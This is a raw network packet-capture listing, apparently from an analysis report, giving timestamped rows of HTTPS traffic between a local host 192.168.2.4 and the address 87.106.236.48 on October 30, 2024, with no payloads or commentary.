                                                                                              Oct 30, 2024 19:47:14.504873991 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.504935026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.504945993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.504985094 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.586802959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.586824894 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.586862087 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.586878061 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.586903095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.586910963 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.587853909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.587868929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.587907076 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.587914944 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.587941885 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.587954998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.588967085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.588983059 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.589024067 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.589030981 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.589087009 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.701467037 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.701493025 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.701544046 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.701562881 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.701572895 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.701596975 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.711035967 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.711059093 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.711147070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.711159945 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.711209059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.712017059 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.712037086 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.712084055 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.712094069 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.712117910 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.712136984 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.752904892 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.752923965 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.752984047 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.752998114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.753042936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.833805084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.833830118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.833889961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.833899021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.833956957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.834778070 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.834795952 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.834896088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.834903955 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.835000992 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.874767065 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.874793053 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.874829054 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.874835968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.874887943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.874887943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.922717094 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.922738075 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.922856092 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.922863007 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.922894001 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.922976017 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.957742929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.957762957 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.957853079 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.957869053 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.958642006 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.958662987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.958756924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.958756924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.958765984 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.959319115 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.999052048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.999075890 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.999259949 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:14.999268055 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:14.999680996 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.081310034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.081332922 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.082298040 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.082351923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.082355976 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.082370996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.082405090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.082437992 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.082437992 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.083085060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.083100080 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.083223104 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.083229065 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.083586931 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.122514963 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.122534990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.122627020 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.122633934 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.122751951 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.212655067 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.212675095 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.213062048 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.213069916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.213187933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.213325977 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.213340998 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.213413000 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.213413000 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.213419914 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.213779926 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.214118958 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.214137077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.214349985 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.214355946 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.214823961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.245834112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.245852947 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.245939970 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.245939970 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.245949984 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.246049881 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.293371916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.293392897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.293577909 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.293585062 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.293720961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.336841106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.336863995 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.336941004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.336941004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.336949110 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.337034941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.337599993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.337618113 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.337685108 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.337685108 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.337692022 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.338145018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.338164091 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.338176966 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.338181973 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.338219881 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.338491917 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.371340036 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.371361971 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.371748924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.371757030 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.371890068 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.459945917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.459969044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.460071087 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.460086107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.460313082 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.460690022 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.460707903 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.460783005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.460783005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.460789919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.461153984 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.461312056 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.461327076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.461425066 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.461431980 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.461556911 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.492973089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.492995024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.493081093 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.493081093 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.493088961 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.493398905 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.540210009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.540232897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.540332079 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.540340900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.540472031 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.583329916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.583353043 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.583435059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.583435059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.583442926 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.583592892 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.584448099 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.584464073 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.584537029 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.584542990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.584630966 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.584630966 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.585042000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.585056067 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.585179090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.585186005 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.585261106 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.616372108 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.616394043 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.616473913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.616473913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.616482019 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.616663933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.663831949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.663855076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.664287090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.664295912 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.664561033 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.707351923 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.707375050 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.707473993 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.707473993 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.707483053 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.707771063 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.707792997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.707819939 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.707820892 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.707827091 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.707906961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.708735943 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.708751917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.708781004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.708787918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.708813906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.708813906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.709434032 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.746639013 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.746659994 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.746784925 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.746784925 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.746795893 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.746917009 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.787256002 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.787280083 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.787359953 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.787370920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.787409067 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.787616014 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.830333948 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.830358982 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.830440044 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.830440044 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.830447912 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.830828905 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.831494093 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.831512928 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.831587076 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.831587076 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.831593990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.831962109 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.832103968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.832118988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.832405090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.832411051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.832647085 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.869801044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.869823933 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.870421886 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.870460987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.870568037 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.870568037 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.870568037 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.870582104 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.874125004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.953614950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.953639030 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.953691006 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.953699112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.953738928 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.954211950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.954230070 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.954281092 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.954288006 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.954328060 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.955084085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.955099106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.955154896 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.955162048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.955202103 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.956017971 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.956037045 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.956082106 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.956089973 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.956140041 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.993732929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.993761063 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.993799925 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:15.993805885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:15.993848085 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.034538031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.034559965 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.034609079 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.034616947 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.034651995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.034665108 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.077219963 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.077243090 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.077295065 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.077305079 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.077332020 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.077353954 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.078233957 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.078248024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.078306913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.078314066 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.078346014 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.078365088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.078881025 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.078896999 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.078958035 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.078964949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.079003096 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.116813898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.116836071 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.116888046 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.116897106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.116950035 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.117333889 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.117351055 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.117408037 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.117413998 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.117451906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.157752037 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.157773018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.157829046 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.157856941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.157896996 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.206188917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.206212997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.206264019 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.206294060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.206310034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.206326008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.206491947 CET4434973187.106.236.48192.168.2.4
